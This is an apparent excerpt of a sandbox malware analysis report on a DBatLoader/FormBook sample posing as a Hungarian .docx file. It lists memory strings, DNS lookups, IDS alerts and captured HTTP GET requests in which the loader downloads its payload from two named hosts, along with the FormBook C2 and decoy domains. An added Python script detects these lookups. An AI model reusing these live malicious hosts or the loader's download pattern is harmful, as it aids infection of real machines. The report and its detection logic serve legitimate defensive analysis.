          Source: Binary string: easinvoker.pdbGCTL source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1769510665.0000000021611000.00000004.00000020.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1769510665.00000000215E2000.00000004.00000020.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1782270171.0000000002765000.00000004.00000020.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1699414288.000000007FCE0000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1802025205.0000000020680000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1700194533.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1699986277.0000000002764000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: cmd.pdb source: esentutl.exe, 00000003.00000003.1766177513.0000000005350000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.3.dr
          Source: Binary string: ping.pdb source: esentutl.exe, 00000004.00000003.1771269701.0000000005700000.00000004.00001000.00020000.00000000.sdmp, xpha.pif.4.dr
          Source: Binary string: SndVol.pdb source: explorer.exe, 00000006.00000002.4182572675.0000000010F3F000.00000004.80000000.00040000.00000000.sdmp, netsh.exe, 00000007.00000002.4169965326.0000000001106000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000007.00000002.4171199207.0000000003D8F000.00000004.10000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, Code function 0_2_029A5908: GetModuleHandleA, GetProcAddress, lstrcpynA, lstrcpynA, lstrcpynA, FindFirstFileA, FindClose, lstrlenA, lstrcpynA, lstrlenA, lstrcpynA
Source: C:\Windows\SysWOW64\SndVol.exe, Code function 5_2_047CE470: 4x nop then pop edi
Source: C:\Windows\SysWOW64\netsh.exe, Code function 7_2_00B8E470: 4x nop then pop edi

          Networking

Source: Malware configuration extractor, URLs: http://voievodulgelu.ro/244_Rgzwnbqrkpn
Source: Malware configuration extractor, URLs: http://mbsngradnja.com/244_Rgzwnbqrkpn
Source: Malware configuration extractor, URLs: www.atingdilse.site/d05n/
Source: DNS query: www.apaescortatings.xyz
Source: DNS query: www.9838.xyz
Source: unknown, DNS traffic detected: query: www.trl-migrate.online, reply code: Name error (3, NXDOMAIN)
Source: unknown, DNS traffic detected: query: www.ursing-caregiver-jobs-za-3.bond, reply code: Name error (3, NXDOMAIN)
Source: unknown, DNS traffic detected: query: www.joops.music, reply code: Name error (3, NXDOMAIN)
Source: unknown, DNS traffic detected: query: www.9838.xyz, reply code: Name error (3, NXDOMAIN)
Source: unknown, DNS traffic detected: query: www.ynthia-mcc-lin-tick.link, reply code: Name error (3, NXDOMAIN)
Source: unknown, DNS traffic detected: query: www.atingdilse.site, reply code: Name error (3, NXDOMAIN)
Source: unknown, DNS traffic detected: query: www.egos.design, reply code: Name error (3, NXDOMAIN)
Source: unknown, DNS traffic detected: query: www.apaescortatings.xyz, reply code: Name error (3, NXDOMAIN)
Source: unknown, DNS traffic detected: query: www.upta.bio, reply code: Name error (3, NXDOMAIN)
Source: unknown, DNS traffic detected: query: www.r-outsourcing-69869.bond, reply code: Name error (3, NXDOMAIN)
Source: unknown, DNS traffic detected: query: www.xc31.top, reply code: Server failure (2, SERVFAIL)
Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, Code function 0_2_029BE4B8: InternetCheckConnectionA
Source: Joe Sandbox View, ASN Name: ORIONTELEKOM-ASRS
Source: Joe Sandbox View, ASN Name: DIALTELECOMRO
Source: Network traffic, Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.4:49741
Source: Network traffic, Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.4:49734
Source: global traffic, HTTP traffic detected (listed twice in the report):
  GET /244_Rgzwnbqrkpn HTTP/1.1
  Connection: Keep-Alive
  Accept: */*
  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  Host: voievodulgelu.ro
Source: global traffic, HTTP traffic detected (listed twice in the report):
  GET /244_Rgzwnbqrkpn HTTP/1.1
  Connection: Keep-Alive
  Accept: */*
  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  Host: mbsngradnja.com
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1 (14 occurrences)
Source: global traffic, DNS traffic detected: DNS query: voievodulgelu.ro
Source: global traffic, DNS traffic detected: DNS query: mbsngradnja.com
Source: global traffic, DNS traffic detected: DNS query: www.egos.design
Source: global traffic, DNS traffic detected: DNS query: www.xc31.top
Source: global traffic, DNS traffic detected: DNS query: www.ursing-caregiver-jobs-za-3.bond
Source: global traffic, DNS traffic detected: DNS query: www.trl-migrate.online
Source: global traffic, DNS traffic detected: DNS query: www.r-outsourcing-69869.bond
Source: global traffic, DNS traffic detected: DNS query: www.apaescortatings.xyz
Source: global traffic, DNS traffic detected: DNS query: www.ynthia-mcc-lin-tick.link
Source: global traffic, DNS traffic detected: DNS query: www.atingdilse.site
Source: global traffic, DNS traffic detected: DNS query: www.joops.music
Source: global traffic, DNS traffic detected: DNS query: www.upta.bio
Source: global traffic, DNS traffic detected: DNS query: www.9838.xyz
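The network entries above split into two stages: the DBatLoader stage fetches /244_Rgzwnbqrkpn from the two configured download hosts with the default WinHttpRequest user agent, and the FormBook stage then walks its configuration, resolving "www." plus the real C2 domain and a run of decoy domains, nearly all of which come back NXDOMAIN. The following detection logic is an added example, not part of the report: it loads the domains from the extracted configurations and runs over a constructed resolver log (format "time client qname rcode", an assumption for the example) two checks, one for a single client resolving many distinct names that almost all fail (the report's "tries to resolve many domain names, but no domain seems valid") and one for direct matches of queried names and fetched URLs against the configuration. Only ten of the 64 decoys are carried over to keep the block short.

```python
"""Network-side detection for the DNS and HTTP behaviour listed above (added example)."""
from collections import defaultdict
from urllib.parse import urlsplit

# Domains from the report's extracted DBatLoader and FormBook configurations (decoys: subset).
CONFIG = {
    "dbatloader_download_urls": ["http://voievodulgelu.ro/244_Rgzwnbqrkpn",
                                 "http://mbsngradnja.com/244_Rgzwnbqrkpn"],
    "formbook_c2": ["www.atingdilse.site/d05n/"],
    "formbook_decoy": ["egos.design", "xc31.top", "ursing-caregiver-jobs-za-3.bond",
                       "trl-migrate.online", "r-outsourcing-69869.bond", "apaescortatings.xyz",
                       "ynthia-mcc-lin-tick.link", "joops.music", "upta.bio", "9838.xyz"],
}

# Constructed resolver log: "time client qname rcode". 192.168.2.4 mirrors the report's
# sandbox client; 192.168.2.9 is a benign control with one typo-induced NXDOMAIN.
DNS_LOG = """\
19:16:58 192.168.2.4 voievodulgelu.ro NOERROR
19:16:59 192.168.2.4 mbsngradnja.com NOERROR
19:17:10 192.168.2.4 www.egos.design NXDOMAIN
19:17:11 192.168.2.4 www.xc31.top SERVFAIL
19:17:12 192.168.2.4 www.ursing-caregiver-jobs-za-3.bond NXDOMAIN
19:17:13 192.168.2.4 www.trl-migrate.online NXDOMAIN
19:17:14 192.168.2.4 www.r-outsourcing-69869.bond NXDOMAIN
19:17:15 192.168.2.4 www.apaescortatings.xyz NXDOMAIN
19:17:16 192.168.2.4 www.ynthia-mcc-lin-tick.link NXDOMAIN
19:17:17 192.168.2.4 www.atingdilse.site NXDOMAIN
19:17:18 192.168.2.4 www.joops.music NXDOMAIN
19:17:19 192.168.2.4 www.upta.bio NXDOMAIN
19:17:20 192.168.2.4 www.9838.xyz NXDOMAIN
19:17:21 192.168.2.9 www.microsoft.com NOERROR
19:17:22 192.168.2.9 www.micorsoft.com NXDOMAIN
19:17:23 192.168.2.9 login.microsoftonline.com NOERROR
"""

FAILED = {"NXDOMAIN", "SERVFAIL"}


def parse_log(text):
    """Return (time, client, qname, rcode) tuples; names lower-cased, trailing dot dropped."""
    recs = []
    for line in text.splitlines():
        if line.strip():
            ts, client, qname, rcode = line.split()
            recs.append((ts, client, qname.lower().rstrip("."), rcode.upper()))
    return recs


def strip_www(name):
    return name[4:] if name.startswith("www.") else name


def config_hosts(cfg):
    """Map bare hostname -> label for every configured domain. The C2 entry carries a
    path and no scheme, so it is parsed as a scheme-relative URL."""
    hosts = {}
    for url in cfg["dbatloader_download_urls"]:
        hosts[urlsplit(url).hostname] = "download"
    for entry in cfg["formbook_c2"]:
        hosts[strip_www(urlsplit("//" + entry).hostname)] = "c2"
    for domain in cfg["formbook_decoy"]:
        hosts[strip_www(domain)] = "decoy"
    return hosts


def client_summary(recs):
    """Per client: total queries, failed replies, distinct names."""
    per = defaultdict(lambda: {"total": 0, "failed": 0, "names": set()})
    for _, client, qname, rcode in recs:
        s = per[client]
        s["total"] += 1
        s["names"].add(qname)
        s["failed"] += rcode in FAILED
    return {c: {"total": s["total"], "failed": s["failed"], "distinct": len(s["names"])}
            for c, s in per.items()}


def detect(recs, cfg, min_distinct=8, min_fail_ratio=0.8):
    """Behavioural check (many distinct, mostly failing names) plus configuration IOC matches."""
    alerts = []
    for client, s in client_summary(recs).items():
        ratio = s["failed"] / s["total"]
        if s["distinct"] >= min_distinct and ratio >= min_fail_ratio:
            alerts.append(("many_unresolvable_names", client, s["distinct"], round(ratio, 2)))
    hosts = config_hosts(cfg)
    for _, client, qname, _ in recs:
        label = hosts.get(strip_www(qname))
        if label:
            alerts.append(("config_domain_queried", client, qname, label))
    return alerts


def download_url_hit(cfg, host, path):
    """Match an observed HTTP request (Host header, request path) against the download URLs."""
    for url in cfg["dbatloader_download_urls"]:
        parsed = urlsplit(url)
        if parsed.hostname == host.lower() and parsed.path == path:
            return url
    return None


if __name__ == "__main__":
    for alert in detect(parse_log(DNS_LOG), CONFIG):
        print(alert)
    print(download_url_hit(CONFIG, "voievodulgelu.ro", "/244_Rgzwnbqrkpn"))
```

The behavioural check is the one that survives a configuration change: FormBook's decoys are there to hide the real C2 among failed lookups, so the failure ratio is the signal, not any single name. The IOC match is still useful because the decoy list is shipped with the sample and a query for any of those names from a host that has no reason to visit them is a strong pivot. For the HTTP stage, the "WinHttp.WinHttpRequest.5" user agent in the GET requests above is a second, configuration-independent pivot in proxy logs.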
Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1748851394.000000007F080000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1830361363.000000007F4B0000.00000004.00001000.00020000.00000000.sdmp; strings found in binary or memory:
  • http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
  • http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
  • http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
  • http://crl.comodoca.com/AAACertificateServices.crl04
  • http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
  • http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
  • http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
  • http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
  • http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: explorer.exe, 00000006.00000003.3107012452.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1799656853.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1790982592.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4174806858.000000000982D000.00000004.00000001.00020000.00000000.sdmp; strings found in binary or memory:
  • http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
  • http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
These are CRL and CA-issuer URLs from X.509 certificates (the trailing "0E", "0C", "04", "07" are the ASN.1 bytes that follow the URI, rendered as text), not command-and-control addresses.
          Source: explorer.exe, 00000006.00000003.3107012452.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1799656853.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1790982592.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4174806858.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1748851394.000000007F080000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1830361363.000000007F4B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1748851394.000000007F080000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1830361363.000000007F4B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1802025205.00000000207A3000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://mbsngradnja.com/244_Rgzwnbqrkpn
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1781016526.000000000057F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mbsngradnja.com/244_Rgzwnbqrkpn4W
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1781016526.0000000000597000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mbsngradnja.com/244_RgzwnbqrkpnZ
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1781016526.00000000005B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mbsngradnja.com/244_Rgzwnbqrkpnb:$
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1781016526.0000000000597000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mbsngradnja.com/244_Rgzwnbqrkpnv
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1781016526.00000000005C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mbsngradnja.com/t
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1781016526.00000000005C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mbsngradnja.com:80/244_Rgzwnbqrkpn
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1748851394.000000007F080000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1830361363.000000007F4B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
          Source: explorer.exe, 00000006.00000003.3107012452.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1799656853.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1790982592.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4174806858.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1748851394.000000007F080000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1830361363.000000007F4B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1748851394.000000007F080000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1830361363.000000007F4B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1748851394.000000007F080000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1830361363.000000007F4B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
          Source: explorer.exe, 00000006.00000000.1790982592.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1748851394.000000007F080000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1830361363.000000007F4B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1748851394.000000007F080000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1830361363.000000007F4B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0C
          Source: explorer.exe, 00000006.00000000.1792661792.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.1803231829.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.1794996906.0000000008720000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1802025205.00000000207A3000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://voievodulgelu.ro/244_Rgzwnbqrkpn
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1781016526.000000000056B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://voievodulgelu.ro/244_Rgzwnbqrkpnl
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.9838.xyz
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.9838.xyz/d05n/
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.9838.xyz/d05n/www.ybzert.online
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.9838.xyzReferer:
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.apaescortatings.xyz
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.apaescortatings.xyz/d05n/
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.apaescortatings.xyz/d05n/www.ynthia-mcc-lin-tick.link
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.apaescortatings.xyzReferer:
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.atingdilse.site
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.atingdilse.site/d05n/
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.atingdilse.site/d05n/www.joops.music
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.atingdilse.siteReferer:
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.eanliving.site
          Source: explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.eanliving.site/d05n/
